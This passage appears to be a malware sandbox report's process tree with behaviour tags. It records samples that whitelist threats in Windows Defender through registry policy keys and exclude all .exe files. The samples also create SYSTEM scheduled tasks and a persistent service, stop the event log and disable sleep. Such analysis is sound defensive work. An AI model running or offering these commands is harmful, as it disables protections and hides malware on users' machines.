"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
5⤵
PID:5036

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
6⤵
PID:4640

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
7⤵
PID:2704

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
8⤵
PID:4060

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
6⤵
PID:4504

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
7⤵
PID:1112

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
8⤵
PID:1836

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
6⤵
PID:4480

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
7⤵
PID:4260

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
8⤵
PID:3180

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
6⤵
PID:2056

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
7⤵
PID:4764

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
8⤵
PID:3944

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
6⤵
PID:4416

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
7⤵
PID:2300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
9⤵
PID:968

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:4812

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:1112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4792

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bjeWJKrHnPpdAGCduF" /SC once /ST 07:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS256B.tmp\Install.exe\" bC /yZzdidB 525403 /S" /V1 /F
5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 980
5⤵
- Program crash
PID:1896

C:\Users\Admin\Documents\SimpleAdobe\nuFrcSpmylkm5G1HC88Qwegm.exe
C:\Users\Admin\Documents\SimpleAdobe\nuFrcSpmylkm5G1HC88Qwegm.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:840

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
- Power Settings
PID:2136

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
- Power Settings
PID:4812

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:876

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "CIFUBVHI"
3⤵
- Launches sc.exe
PID:2392

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
3⤵
- Launches sc.exe
PID:388

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:2544

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "CIFUBVHI"
3⤵
- Launches sc.exe
PID:4696

C:\Users\Admin\Documents\SimpleAdobe\3IfifMzwN9KSsku1z7iQUZZd.exe
C:\Users\Admin\Documents\SimpleAdobe\3IfifMzwN9KSsku1z7iQUZZd.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3596

C:\Users\Admin\AppData\Local\Temp\is-MAF96.tmp\3IfifMzwN9KSsku1z7iQUZZd.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MAF96.tmp\3IfifMzwN9KSsku1z7iQUZZd.tmp" /SL5="$160058,4910089,54272,C:\Users\Admin\Documents\SimpleAdobe\3IfifMzwN9KSsku1z7iQUZZd.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2616

C:\Users\Admin\AppData\Local\Direct WAV MP3 Splitter\directwavmp3splitter.exe
"C:\Users\Admin\AppData\Local\Direct WAV MP3 Splitter\directwavmp3splitter.exe" -i
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2404

C:\Users\Admin\AppData\Local\Direct WAV MP3 Splitter\directwavmp3splitter.exe
"C:\Users\Admin\AppData\Local\Direct WAV MP3 Splitter\directwavmp3splitter.exe" -s
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1428

C:\Users\Admin\Documents\SimpleAdobe\mAph8Of7DxihsslLJNYfDDIp.exe
C:\Users\Admin\Documents\SimpleAdobe\mAph8Of7DxihsslLJNYfDDIp.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
PID:4640

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4816

C:\Users\Admin\Desktop\malware\setup.exe
"C:\Users\Admin\Desktop\malware\setup.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2992

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4088

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
- Power Settings
PID:344

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Power Settings
PID:448

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
- Power Settings
PID:4480

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
- Power Settings
PID:4764

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:3944

C:\Windows\system32\svchost.exe
svchost.exe
2⤵
PID:2752

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2236

C:\Users\Admin\AppData\Local\Temp\7zS256B.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS256B.tmp\Install.exe bC /yZzdidB 525403 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:4904

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
PID:2928

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:2020

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:432

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
PID:1528

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:4792

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:3548

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
PID:1792

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
PID:4696

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:2856

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
PID:1288

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
PID:3016

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:4640

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:3652

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
PID:448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:180

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:4136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1212

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:2524

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:4296

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:2316

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:2676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:5116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:3624

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:2464

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:3012

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:3240

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:4312

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:1156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:3720

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:1920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:4088

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:1592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:724

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3744

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4060

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:1472

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:1512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:1960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:2392

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:3800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:1236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:3300

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:4584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
